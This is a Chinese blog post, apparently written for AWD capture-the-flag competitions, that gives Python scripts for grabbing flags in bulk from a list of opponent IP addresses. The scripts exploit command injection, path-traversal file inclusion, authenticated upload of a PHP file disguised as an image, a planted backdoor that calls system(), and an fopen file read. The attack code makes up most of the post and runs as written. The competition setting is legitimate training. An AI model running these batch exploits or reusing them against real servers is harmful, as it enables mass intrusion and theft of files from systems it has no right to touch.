红蓝对抗-AWD全流程攻略05(批量获取flag)

已于 2024-05-04 23:05:32 修改
阅读量655 收藏 11
点赞数 4
分类专栏: AWD攻防对抗比赛 文章标签: 安全
于 2024-05-03 23:48:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67189356/article/details/138401788
版权
文章讲述了在AWD比赛中如何通过Python编程实现漏洞批量扫描和flag获取,涉及命令执行、文件包含、get和post传参漏洞,以及文件上传和预留后门文件利用的技术细节。
摘要由CSDN通过智能技术生成

AWD比赛中,是以周期得分当你发现一个漏洞即可连续批量的分,要想连续得分必须会权限维持,还有批量获取flag,本文记录如何批量获取前文相关漏洞的flag.

第3节 (攻防模拟)对应漏洞

01 python(使用语言)

Python是一种跨平台的计算机程序设计语言。是一种面向对象的动态类型语言,最初被设计用于编写自动化脚本(shel),随着版本的不断更新和语言新功能的添加,越多被用于独立的大型项目的开发。在写批量脚本的过程需要掌握python语言。

 02 漏洞批量脚本

命令执行 

post传参 漏洞点

import requests

f = open('ip.txt','r')
data = {"shell":'cat /flag'}
for i in f.readlines():
    url = 'http://'+i.strip()+'/footer.php'
    r = requests.post(url,data=data)
    x = r.text
    print(url +'    '+ x)

文件包含

get 传参 漏洞点

列举两种写法

#正则匹配
import requests
import re

f = open('ip.txt','r')
for i in f.readlines():
    url = 'http://'+i.strip()+''
    path = '/about.php?file=/flag'
    palyoad = url + path
    r = requests.get(palyoad)
    result = re.search('[a-z0-9]{32}',r.text)
    if r.status_code==200:
        print(url,result.group())
    else:
        print(url,"There is no flag here")
f.close()
#切片
import requests

f = open('ip.txt','r')
for i in f.readlines():
    url = 'http://'+i.strip()
    url_path = '/about.php?file=../../../../../../../flag'
    palyoad = url + url_path
    r = requests.get(palyoad)
    i = r.text.split('\n')
    print(url+'   '+i[0].split('<')[0])

 文件上传

漏洞点

import requests
f = open('ip.txt','r')
for i in f.readlines():

    URL = 'http://'+ i.strip()
    url_path = '/login.php'
    url_path1 = '/admin/upload.php'

    url = URL + url_path
    user_passwd = {'username':'admin',
        'password':'mysql',
        'button':'SIGN-I',}
    s=requests.Session()
    r=s.post(url,data=user_passwd)
    header = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',}
    file ={
        'pic':('2.php',open('a.php','rb')),   #1.php这一块是文件名 ; pic也必须得改,是Content-Disposition: form-data; name="pic"; filename="php_mmr.php"
        'Content-Disposition':'form-data',
        'Content-Type':'image/jpeg',
    }
    url = URL + url_path1

    r1 = s.post(url = url, files=file,headers=header)
    r1.encoding = r1.apparent_encoding
    if r1.status_code != 200:
        print(url + '    \033[1;31m上传失败\033[0m')
    else :
        for i in r1.text.split('\n'):
            if '上传成功' in i:
                print(url + '    \033[1;32m上传成功\033[0m   ' + i)
                break

 预留后门文件利用

import requests


f = open('ip.txt', 'r')
for i in f.readlines():

    url = 'http://' + i.strip()
    url_path = '/a.php?c=system("cat /flag");'
    r = requests.get(url + url_path)
    i = r.text.split('\n')
    print(url+'    '+i[0].split('<')[0])

fopen漏洞

import requests
import re

f = open('ip.txt', 'r')
for i in f.readlines():

    url = 'http://' + i.strip()+''
    path = '/contact.php?path=/flag'
    payload = url + path
    r = requests.get(url + path)
    x = r.text
    result = re.search('[a-z0-9]{32}',x)
    print(url, result.group())

王志德发
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
awd赛题的flag是什么意思_CTF线下赛AWD模式下的生存技巧
weixin_33586720的博客
12-24 891
作者:Veneno@Nu1L稿费:200RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿Hello,大家好,我是Nu1L战队队长Veneno,通过这篇文章说一下关于CTF线下赛的AWD模式(当然也有一些比赛是沙盒模式),以及身为一只Web狗的你如何在各位大佬们的手下存活:)可能没有技术干货,大家勿喷:)1-何为AWDAttack With Defence,简而言之就是你既...
【网络安全】CTF-AWD入门手册
2201_75857562的博客
02-02 2021
AWD赛制是一种网络安全竞赛的赛制。
awd-python批量拿flag批量提交
weixin_46079186的博客
06-26 5720
代码仅供参考 import requests import re data = { '123':"system('cat+/home/ctf/flag');" # 一句话木马 } list = [] def shell(): for i in range(1,255): try: io = requests.get("http://192-168-1-" + str(i) + ".awd.bugku.cn/e/search/result/
AWD攻防中读取flag批量脚本
09-05
AWD攻防中读取flag批量脚本,可能需要自行修改下
探秘AWD比赛,你的技术提升之旅从这里开始!
最新发布
gitblog_00095的博客
06-08 274
探秘AWD比赛,你的技术提升之旅从这里开始! 项目地址:https://gitcode.com/AabyssZG/AWD-Guide 在这个数字世界里,网络安全显得至关重要,而CTF(Capture The Flag)比赛正是检验和提升这方面技能的最佳舞台之一。其中,AWD(Attack With Defense)模式以其实战性和对抗性深受广大安全爱好者喜爱。今天,我们有幸向你推荐一本独特的开源项...
awd中实用的脚本
as you know, nlp is fantasitc!
09-07 1009
【代码】在awd中实用的脚本。
AWD:赛前准备工作以及深度脚本讲解
薯片薯条的博客
11-10 9931
有幸被邀请代表学校去参加线下攻防,也就是俗称的AWD比赛。 当然,在这一方面我也只能算是小白,所以希望各位大佬在看完我写的博客以后能指正一些错误。 一.比赛介绍 AWD赛制是按照分组来进行比赛的。每组3-4人,经过不同的分工,从而实现对服务器的维护以及对其他人的服务器进行攻击。 每个服务器都会有一个提前放好的有漏洞的网站,需要进行代码审计,然后修补漏洞。 举个例子,某些参数一可以参杂系统的cmd命令上来,如果执行成功,就会获取你服务器上某个文件夹下的flag.txt的内容,一旦获取成功,就代表被攻破。 .
awd比赛可用的自动化获取flag脚本。.zip
09-30
awd比赛可用的自动化获取flag脚本。
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7531
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
awd比赛用到的脚本.zip
08-24
国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。
awd批量脚本 pwn_记一次AWD反杀之旅
weixin_39611340的博客
12-20 1140
背景星盟团队的内部awd训练,邀请我们团队参加,然后想着也没什么事情就报名了。为什么说叫反杀之旅?因为最开始的候由于技术师傅的手误,前两轮设置后台check扣分的候多按了一个0,导致一次check扣了我们1000分。。。本来每个队初始分数是1000,结果我们一下变成了0,成了倒数第一。不过经过团队的紧张的补救以及多年的手速,在多扣了几百分的情况下最后追赶到了正数第二名的位置。觉得还挺有意思,所...
第80天:红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
以下是对红蓝对抗AWD模式的一些关键知识点的详细说明: 1. **比赛规则**: - AWD比赛通常涉及到SSH服务和Web服务,每五分钟更新一次flag,被夺旗的队伍会失去相应的分数。 - 主办方会对服务进行定期检查,如果...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
从红队视角看AWD攻击
二狗的博客
02-20 3426
使用了其中的Web1来进行演示预设后门为:http://localhost:8000/?对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
探索高效自动化:AWD_Script - 动态脚本管理工具
gitblog_00010的博客
04-01 340
探索高效自动化:AWD_Script - 动态脚本管理工具 项目地址:https://gitcode.com/i0gan/awd_script 在数字化代的今天,自动化成为了提高效率的关键。AWD_Script 是一个强大而易用的动态脚本管理平台,旨在简化脚本编写、执行和维护的过程。本文将深入剖析该项目的核心功能、技术实现及应用场景,带你领略自动化新高度。 项目简介 AWD_Script 是一款...
AWD指南
学生
11-04 3060
经过整理,需要的一些工具和脚本,AWD思路(方便到候直接复制粘贴,提高效率)
红蓝对抗-AWD流程攻略07(Python脚本编写)
m0_67189356的博客
05-05 887
AWD中编写python脚本相关的基础知识
AWD靶机实战第二天:使用python脚本获取flag
2203_75839317的博客
04-10 1336
ls /flag.txt,就可以拿到flag的值。4,自动提交flag:现在我们就要考虑如何进行自动提交flag,我们来到提交页面发现有提示,有请求头。
AWD准备的一些脚本和工具及其使用方法
weixin_44377940的博客
09-23 9167
最近一段间去打了一次省赛的线下,虽然体验不怎么好,但有些准备的小东西还是不错的,写下来分享一下: 代码审计工具 seay源码审计系统,下载链接:https://github.com/f1tz/cnseay。这个源码审计工具有点点拉,但还是比没有好。使用方法: 然后结果就在右边。 ...
awd 批量获取flag
09-25
awd(Attack-Defence,攻击与防守)是一种网络安全竞赛形式,参赛者需要在拥有相同的漏洞环境中,互相攻击对方的系统,同保护自己的系统免受攻击。比赛的目标是尽可能获取对方系统中的标志性 flag。 在awd中,批量获取flag是指通过某种方法快速获取多个flag的行为。然而,批量获取flag是不被鼓励且违反竞赛规则的行为,因为它破坏了竞赛的公平性和技术竞争的原则。 竞赛组织者会采取一系列的措施防止批量获取flag的行为: 1. 漏洞环境的安全性:竞赛组织者会尽力确保漏洞环境的安全性,修复已知的漏洞并设置有效的防御机制,以防止参赛者通过简单的手法获取flag。 2. Flag的保护:竞赛组织者会对flag进行加密或隐藏,并设置多重保护措施。只有通过特定漏洞利用或完成特定任务的参赛者才能获取flag,从而增加了获取flag的难度。 3. 监控机制:竞赛组织者会设置监控系统,对参赛者的行为进行实跟踪和分析。如果发现异常的获取flag行为,组织者将采取相应措施,并有权取消参赛者的资格。 总体而言,awd竞赛强调的是技术实力和攻防对抗的能力,追求公平竞争和攻击与防御技巧的提升。尝试批量获取flag不仅违背了竞赛规则,还会损害awd竞赛的精神和目的。因此,参赛者应该遵守竞赛规则,以合法的方式争取获取flag,并积极参与竞赛的学习和交流过程,提升自身的技术实力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值